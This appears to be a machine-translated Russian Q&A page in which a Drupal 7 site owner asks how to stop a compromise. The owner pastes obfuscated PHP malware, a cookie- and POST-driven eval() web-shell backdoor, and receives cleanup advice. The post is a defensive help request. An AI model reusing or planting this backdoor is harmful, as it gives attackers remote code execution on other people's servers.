Drupal 7 Последние сообщения журнала - PullRequest
Новая
       36

Drupal 7 Последние сообщения журнала

0 голосов
/ 30 мая 2018

Я столкнулся с проблемой.Каждый день на моем сервере появляются файлы .ico и .php с таким кодом:

$ zvtizrs = 'y6v1i4be # torufpkxc7_8Hg0n * -2sladm \' '; $ yjzgov = Array (); $ yjzgov[] = $ zvtizrs [30]. $ zvtizrs [3]. $ zvtizrs [30]. $ zvtizrs [27]. $ zvtizrs [1]. $ zvtizrs [23]. $ zvtizrs [30]. $ zvtizrs [13]. $ zvtizrs [26]. $ zvtizrs [6]. $ zvtizrs [20]. $ zvtizrs [31]. $ zvtizrs [30]. $ zvtizrs [26]. $ zvtizrs [5]. $ zvtizrs [3]. $zvtizrs [27]. $ zvtizrs [18]. $ zvtizrs [26]. $ zvtizrs [20]. $ zvtizrs [3]. $ zvtizrs [13]. $ zvtizrs [27]. $ zvtizrs [26]. $ zvtizrs [1]. $ zvtizrs [23]. $ zvtizrs [5]. $ zvtizrs [13]. $ zvtizrs [5]. $ zvtizrs [13]. $ zvtizrs [23]. $ zvtizrs [20]. $ zvtizrs [30]. $ zvtizrs [18]. $ zvtizrs [17]. $ zvtizrs [7]; $ yjzgov [] = $ zvtizrs [21]. $ zvtizrs [25]; $ yjzgov [] = $ zvtizrs [8]; $ yjzgov [] = $ zvtizrs [17]. $ zvtizrs [10]. $ zvtizrs [12]. $ zvtizrs [24]. $ zvtizrs [9]; $ yjzgov [] = $ zvtizrs [28]. $ zvtizrs [9]. $....... zvtizrs [11] $ zvtizrs [19] $ zvtizrs [11] $ zvtizrs [7] $ zvtizrs [14] $ zvtizrs [7] $ zvtizrs [30] $ zvtizrs [9]; $ yjzgov [] = $ zvtizrs [7]. $ zvtizrs [16]. $ zvtizrs [14]. $ zvtizrs [29]. $ zvtizrs [10]. $ zvtizrs [31]. $zvtizrs [7]; $ yjzgov [] = $ zvtizrs [28]. $ zvtizrs [12]. $ zvtizrs [6]. $ zvtizrs [28]. $ zvtizrs [9]. $ zvtizrs [11]; $ yjzgov []= $ zvtizrs [30]. $ zvtizrs [11]. $ zvtizrs [11]. $ zvtizrs [30]. $ zvtizrs [0]. $ zvtizrs [19]. $ zvtizrs [32]. $ zvtizrs [7]. $zvtizrs [11]. $ zvtizrs [22]. $ zvtizrs [7]; $ yjzgov [] = $ zvtizrs [28]. $ zvtizrs [9]. $ zvtizrs [11]. $ zvtizrs [29]. $ zvtizrs [7]. $ zvtizrs [24]; $ yjzgov [] = $ zvtizrs [14]. $ zvtizrs [30]. $ zvtizrs [17]. $ zvtizrs [15]; foreach ($ yjzgov [7] ($ _ COOKIE, $ _POST) as $ xtfjdc => $ jqlwt) {function frtdmz ($ yjzgov, $ xtfjdc, $ omljrbn) {return $ yjzgov [6] ($ yjzgov [4] ($ xtfjdc.$ yjzgov [0], ($ omljrbn / $ yjzgov8) + 1), 0, $ omljrbn);} функция htylm ($ yjzgov, $ xwoin) {return @ $ yjzgov [9] ($ yjzgov [1], $ xwoin);} функция twdine ($ yjzgov, $ xwoin) {$ sknbn = $ yjzgov3% 3; if (! $ sknbn) {eval ($ xwoin1); exit ();}} $ jqlwt = htylm ($ yjzgov, $ jqlwt); twdine ($ yjzgov, $ yjzgov [5] ($ yjzgov [2], $ jqlwt ^ frtdmz ($ yjzgov, $ xtfjdc, $ yjzgov8)));}

Не могли бы вы сказатьмне что мне делать?Я использую хостинг RackSpace.Также у меня есть много ссылок, подобных этой (/ d0E0MDY5VDNpanR6NDM5MzFJaQ ==) в недавнем журнале.Как я могу это остановить?

Заранее спасибо!

1 Ответ

0 голосов
/ 04 июня 2018

взломан.Я недавно убирал взломанный сайт сам, и это был кошмар.Лучше всего будет извлечь из резервной копии последнюю версию и немедленно применить все обновления безопасности.Если нет резервной копии (большая проблема!), Вы можете попробовать «очистить» сайт, как я сделал:

  • Очистите все файлы с вредоносным контентом.Перейдите к поиску / замене всех файлов.
  • Сделайте дамп базы данных и сделайте то же самое, чтобы сбросить файл - удалите вредоносный контент и затем импортируйте его обратно.
  • Проверьте учетные записи пользователей.Если есть какие-то подозрительные блоки, удалите их.
  • Проверьте вновь созданные подозрительные группы пользователей.Удалите их тоже.
  • Сделайте резервную копию.
  • Примените все обновления / исправления безопасности.Снова создайте новое резервное копирование.
  • Измените все пароли учетных записей (администраторы drupal, учетные записи ftp, учетные записи базы данных).
  • Установите резервное копирование по расписанию.Т.е. для этого используйте модуль Becakup & Migrate.
...